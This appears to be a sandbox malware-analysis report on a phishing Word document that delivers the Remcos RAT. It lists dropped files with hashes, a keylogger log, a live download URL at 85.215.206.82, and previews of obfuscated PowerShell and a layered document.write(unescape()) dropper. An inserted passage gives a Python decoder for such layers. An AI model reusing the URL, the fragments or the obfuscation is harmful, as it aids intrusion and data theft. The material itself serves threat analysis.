                                                                                                                                                                        SHA-512:57CC2F5FCF392A8FBD798045F6875C7ADDCFF6F6D35C3D6ED720B5FFFC2C0593A4CAD2AC8C47742F5E3C05C84B681E068FD4B766E5D77738AB0CE4D1C2EB758E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..
                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                        Entropy (8bit):3.553171697638741
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:6ljnOugl55YcIeeDAlANOaplQlmHSNombQOfxNa/WA7DxbN2fBMMm0v:6ltgDecqNOilLyp50/WItN25MMl
                                                                                                                                                                        MD5:108AB0025FAF6B85E61C5AF2BA2B4633
                                                                                                                                                                        SHA1:8ED1B3241CEF667725DA71177AF3F723E5E38E9D
                                                                                                                                                                        SHA-256:5420EF90BC31A7DC3E69A7FE800299C6D05EF7F2648DAF18B5B9F1D7441D10A4
                                                                                                                                                                        SHA-512:FE158C87BF6E728B1B6F97528E31A1E85A93719D2BE3600BF8941CD5B6E2912EA07D11A3B0C7100CAA291F8F4C056A95A21EB3850650D44A7CD7D867D9E4EDFC
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, Author: Joe Security
                                                                                                                                                                         Preview:(UTF-16 text decoded) [2024/10/23 11:27:20 Offline Keylogger Started] [PO NAHK22012FA00000.docx [Compatibility Mode] - Microsoft Word] [New Tab - Google Chrome] [Program Manager] { User has been idle for 0 minutes }
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:1
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                        Entropy (8bit):0.025568139522252297
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:I3DPc4CavqvxggLRHSigdtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPRkLiRvYg3J/
                                                                                                                                                                        MD5:2DF6C5CCA2DE2FDD8DB8169313A807B2
                                                                                                                                                                        SHA1:02509CAAD465A111DB7AFA01C0D4842FDE8456BF
                                                                                                                                                                        SHA-256:8610B56CE4AE8553280D8195BE22BD30084EFB106743484239B2E1594B895750
                                                                                                                                                                        SHA-512:DA59566C2996FC5E2FE8C00659E88E75B42C054A4239E4A6A93A5222773D2B2322DC7E66983EC25D740C78EF594F94249C41998C5FDA94D455A9676283BDC1DA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):131072
                                                                                                                                                                        Entropy (8bit):0.025593217010028504
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:I3DPc3FvxggLR1bgvIqg/RXv//4tfnRujlw//+GtluJ/eRuj:I3DPyJ9qGvYg3J/
                                                                                                                                                                        MD5:C4C34027D6BD02D908AC1B9AA9B58905
                                                                                                                                                                        SHA1:F53802BD01593E9055166DFCD19BD263FE1F6E57
                                                                                                                                                                        SHA-256:B10F7148DB75CFCC8D7F701FC0C8CD3AC9A574B1078591E25DC37C5772B955BA
                                                                                                                                                                        SHA-512:66B01FCB68C96C1B0F6E9FFF3E7309F6D2B3531B1869B585820297EAABE4E40D8DF7C3799137ADA7468DD5DFB76E96D95A53F3E4B7230B72D0F27800611128C1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:......M.eFy...z:.W..o.N.t..FH..S,...X.F...Fa.q............................".9.!.<G...............>.y.mD.X.k.L.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Wed Oct 23 14:26:05 2024, length=711761, window=hide
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1084
                                                                                                                                                                        Entropy (8bit):4.544829197222997
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:8bDah460gXg/XAlCPCHaXPqzBdB/5YXX+WBWcYIhNOilQicvbuflNOil+DtZ3YiX:8bDa6/XTizv4Xnj4iBeU4igDv3q6i57u
                                                                                                                                                                        MD5:DAA43B262800C03F9BF99DD6A62FE9CD
                                                                                                                                                                        SHA1:08D5504D8A30F877AD376AF38CEE98C505203088
                                                                                                                                                                        SHA-256:95806EFC73AA97D4FF8FC43BD66A964BAAE389D7467F4C9461A7BF66AEA9E711
                                                                                                                                                                        SHA-512:8520919F37F658EFA4C3F90DDBA41BA86FC8D84B03C32A665DF830A77CD5DFBEF8A356E618344DE1D86BA7E07741052B424B3E000B702F5913327A1B63DB3F4B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:L..................F.... ....w..r....w..r....3.._%..Q............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....WYA{..user.8......QK.XWYA{*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.Q...WYC{ .PONAHK~1.DOC..f.......WE..WE.*.........................P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\376483\Users.user\Desktop\PO NAHK22012FA00000.docx.doc.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Generic INItialization configuration [doc]
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):109
                                                                                                                                                                        Entropy (8bit):4.661552132641317
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:bDZwbQL3Ru0/ZLFSmX1gRk0/ZLFSv:bK0bRu0/ZLFqRk0/ZLFc
                                                                                                                                                                        MD5:34D97D9BD9E741DCCC928E4069C53B22
                                                                                                                                                                        SHA1:8EA369C201E19E09BD83679B6233DF29B0EF5E9F
                                                                                                                                                                        SHA-256:5E3F338289E16C8798CAEFC8337EFDA6C51A50884BDBAACB15738FAB4FA91F67
                                                                                                                                                                        SHA-512:010E2333C279AAEC58793AAEF53F9CFD26BF906BBEC3FCED8EFAB9E148BA92BAEB92243F62528BFFA6E47D11A6188C7456C948EF33A5B80CB3E06649C1A98FB5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[folders]..wg on 85.215.206.82.url=0..PO NAHK22012FA00000.docx.LNK=0..[doc]..PO NAHK22012FA00000.docx.LNK=0..
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<http://85.215.206.82/270/weg/wg/>), ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):58
                                                                                                                                                                        Entropy (8bit):4.67644090869687
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:HRAbABGQYm/SXUkSmKzJSY:HRYFVm/kUkS9FB
                                                                                                                                                                        MD5:B4311F9003A4E484101F1987676D1D76
                                                                                                                                                                        SHA1:72E83BBD71485A8975EC8F54F64E948CB4E323AB
                                                                                                                                                                        SHA-256:204DD6864887232AB9626BBDB3C029E72A508C8A2500A3BC3E41CC58EAEA890A
                                                                                                                                                                        SHA-512:362969C8223D4BFC9B5F14331357A6885054E04C0A766C70CCA567B0D0688BEA2953BDF77BD277F10ABB95F6E2C985413478647267BF601EA2DC4BE453973E1F
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:[InternetShortcut]..URL=http://85.215.206.82/270/weg/wg/..
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                        Entropy (8bit):2.4797606462020307
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):140662
                                                                                                                                                                        Entropy (8bit):3.687456635992758
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:kSb7gt5pWGwiAON6gpvRwd07c3v9TVyr2HUDH:zKRRwd0eVTY2CH
                                                                                                                                                                        MD5:E9D4662595A294AA122FB25CB9596E64
                                                                                                                                                                        SHA1:62F49FFD85F901F68EEB23A3DE78D3A19E28D0F6
                                                                                                                                                                        SHA-256:99D2EF08D3101CDFD89AFEA909815A7448200A7175A85D13C19B29DB084C7DD1
                                                                                                                                                                        SHA-512:CD164953B1DDD6416611DB863F61B0FE69C5AA4271B033E5E72118F31D2FBD2E0440CFB37137768185D85692B56F11B7433212B1B858C248692CA13C163C6D1F
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.v.i.n.a.g.r.a.r.)..... . . . .d.i.m. .c.a.r.n.i.s.t.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .c.a.r.n.i.s.t.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .c.a.r.n.i.s.t.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.
                                                                                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):133688
                                                                                                                                                                        Entropy (8bit):2.5311599425492504
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:Eam7X/Ot9CLGFNOt9CaIGcHFX6k6m46FHHO7HxOt9CZ4Ot9CiimAb5WGwONOt9CH:Ea2Xmt4+Et4jlXPRt47t4SGEt4TT
                                                                                                                                                                        MD5:02B4AB021D0F800EC41B06E11B8DA4AC
                                                                                                                                                                        SHA1:767D0E4DDDF988CA60A9C1DFDA19B7CFC0D56B47
                                                                                                                                                                        SHA-256:137502965371FE3D3DADD7C0BF9EB27103DCFD391E7676F322022F2C46DB9084
                                                                                                                                                                        SHA-512:6F79B586DEE5CB23D152E31941CBA571C27F4C905C74F2E04BF534315D74132CDA92FBD2960367AFAF9936F7E7C68C3166C94BCEBD3F8C4B9783480F9A4B0A5A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscrIpT%252520laNGuAge%25253D%252522VbscRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
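The dropped HTML above is built as nested layers: an outer document.write(unescape("...")) whose decoded content is another JavaScript layer that stores a percent-encoded string in a variable and unescapes it again, and so on (the %25 and %2525 prefixes in the preview are the tell), until a mixed-case VBScript block behind an IE8-emulation meta tag appears. The following decoder, added here as an example and not code from Joe Sandbox or from the sample, peels those layers one at a time. Its input is constructed to mirror the shape of the preview; the VBScript body is a placeholder, since the real file's decoded content is not shown on the page.

```python
"""Peel nested document.write(unescape(...)) layers from an HTML dropper.

Added example (not code from the sandbox report or the sample). The input is
built here to mirror the preview's structure; the VBScript body is a
constructed placeholder.
"""
import re
from urllib.parse import quote, unquote

# Constructed innermost layer: mirrors the tags visible in the preview
# (X-UA-Compatible meta forcing IE8 emulation, mixed-case VBScript tag).
INNER_VBSCRIPT = (
    '<!DOCTYPE html>\n'
    '<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\n'
    '<html>\n<body>\n'
    '<scrIpT laNGuAge="VbscRiPT">\n'
    'Dim payload\n'
    'payload = "placeholder - not the sample\'s real VBScript"\n'
    '</scrIpT>\n</body>\n</html>'
)


def wrap_layer(body, var="m"):
    """Wrap `body` the way the dropper does: percent-encode it, stash it in a
    JavaScript string literal and hand it to document.write(unescape(var))."""
    enc = quote(body, safe="")
    return (f"<script language=JavaScript>{var}='{enc}';"
            f"document.write(unescape({var}))</script>")


def build_sample(depth=3):
    """Construct a dropper with `depth` inner JavaScript layers plus the outer
    document.write(unescape("...")) seen at the start of the preview."""
    doc = INNER_VBSCRIPT
    for _ in range(depth):
        doc = wrap_layer(doc)
    return f'<script>document.write(unescape("{quote(doc, safe="")}"))</script>'


# unescape("...") with the literal inline, or unescape(var) with var='...' earlier
_LITERAL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
_VARREF = re.compile(r"unescape\(\s*([A-Za-z_]\w*)\s*\)")
_SCRIPT_LANG = re.compile(r"""<script[^>]*language\s*=\s*["']?([A-Za-z]+)""", re.I)


def _extract_argument(doc):
    """Return the percent-encoded string handed to unescape(), or None."""
    m = _LITERAL.search(doc)
    if m:
        return m.group(2)
    m = _VARREF.search(doc)
    if m:
        name = re.escape(m.group(1))
        assign = re.search(rf"""\b{name}\s*=\s*(["'])(.*?)\1""", doc, re.S)
        if assign:
            return assign.group(2)
    return None


def peel(doc, max_layers=32):
    """Decode layer by layer; returns every layer, outermost first.
    max_layers bounds the loop so a self-referencing blob cannot spin forever."""
    layers = [doc]
    for _ in range(max_layers):
        arg = _extract_argument(layers[-1])
        if arg is None:
            break
        layers.append(unquote(arg))
    return layers


def analyse(doc):
    """Summarise a dropper: how many decode steps were needed and which script
    language the innermost layer declares (case-insensitive, as in the sample)."""
    layers = peel(doc)
    final = layers[-1]
    lang = _SCRIPT_LANG.search(final)
    return {
        "decode_steps": len(layers) - 1,
        "final_language": lang.group(1).lower() if lang else None,
        "final_snippet": final[:80],
    }


if __name__ == "__main__":
    sample = build_sample(3)
    print(sample[:120] + "...")
    print(analyse(sample))
```

Running it on the constructed sample reports four decode steps and a final language of "vbscript"; a detection that only inspects the outer layer sees JavaScript and a harmless-looking percent-encoded string, which is the point of the layering.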
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):825645
                                                                                                                                                                        Entropy (8bit):7.9920885509455575
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:24576:dOe8OEfRkETfsIgLmGqvo+IPIrRE76UpYb5h:dOexi1gLLqvol+225h
                                                                                                                                                                        MD5:1F118B82BDF2ECFBDB48A0F8932D626D
                                                                                                                                                                        SHA1:25561C15F33F67BD0C5A21CB5FC6628598777C4C
                                                                                                                                                                        SHA-256:1FE3589CF5A0D9981DBC24BF1BC51DDEFF491462C86243A5362B45EB31FD7669
                                                                                                                                                                        SHA-512:ED4C4D34A3180A48B7FA85D8F9174404F0AED6ED916D42509C8B196B0B8FE95602C66F302AE0C36146E2923F9A79D55DA20584D5AB5B303868EE319AA49EF1AD
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):162
                                                                                                                                                                        Entropy (8bit):2.4797606462020307
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                                                        MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                                                        SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                                                        SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                                                        SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):825645
                                                                                                                                                                        Entropy (8bit):7.9920885509455575
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:24576:dOe8OEfRkETfsIgLmGqvo+IPIrRE76UpYb5h:dOexi1gLLqvol+225h
                                                                                                                                                                        MD5:1F118B82BDF2ECFBDB48A0F8932D626D
                                                                                                                                                                        SHA1:25561C15F33F67BD0C5A21CB5FC6628598777C4C
                                                                                                                                                                        SHA-256:1FE3589CF5A0D9981DBC24BF1BC51DDEFF491462C86243A5362B45EB31FD7669
                                                                                                                                                                        SHA-512:ED4C4D34A3180A48B7FA85D8F9174404F0AED6ED916D42509C8B196B0B8FE95602C66F302AE0C36146E2923F9A79D55DA20584D5AB5B303868EE319AA49EF1AD
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:PK..........!.e.......*.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VKo.0.....0t.l.-0.C...8...agE.c.....&.~T..]..........AR ..+.d...v.dg.e`.S..K.s~..cYDa.h....!....O...C.(....;.Q.`D,..K'..F ..%.B>.%....+.."X.1a....*..`v......,.j.KT%..7Z.$...=..U....|2.].....A"....T{..$}.<........Q[..En..Z...Rs.!..w....r.. {................#..i....mw...n .'W.........*.!JL..x.......!$._....'.q..+...?FS...WH..Z.c.....V..a..+... .........?.?.k..-p........o.t...........\,.8}.:..&@.E.o.....(iB>.
                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                        File type:Microsoft Word 2007+
                                                                                                                                                                        Entropy (8bit):7.988999439714533
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                                                        • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                                                        • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                                                        File name:PO NAHK22012FA00000.docx.doc
                                                                                                                                                                        File size:711'761 bytes
                                                                                                                                                                        MD5:a4633b398a95e20e7ec12dcaf3090e43
                                                                                                                                                                        SHA1:06b1ecd43566ad5aaa16986c0bccaf5c1561a31b
                                                                                                                                                                        SHA256:e3c8080fba2dae8436582c23e49387b29f15dab713779d2d0f16a9d3ec022f3d
                                                                                                                                                                        SHA512:dd640250a82e34bcfe687153b29d61daf5745df79a42c9bb88b8542fc289be4d509f91eade9afd0e51a1ab061ca76664504a264f5a878efdd67534a365f7ec54
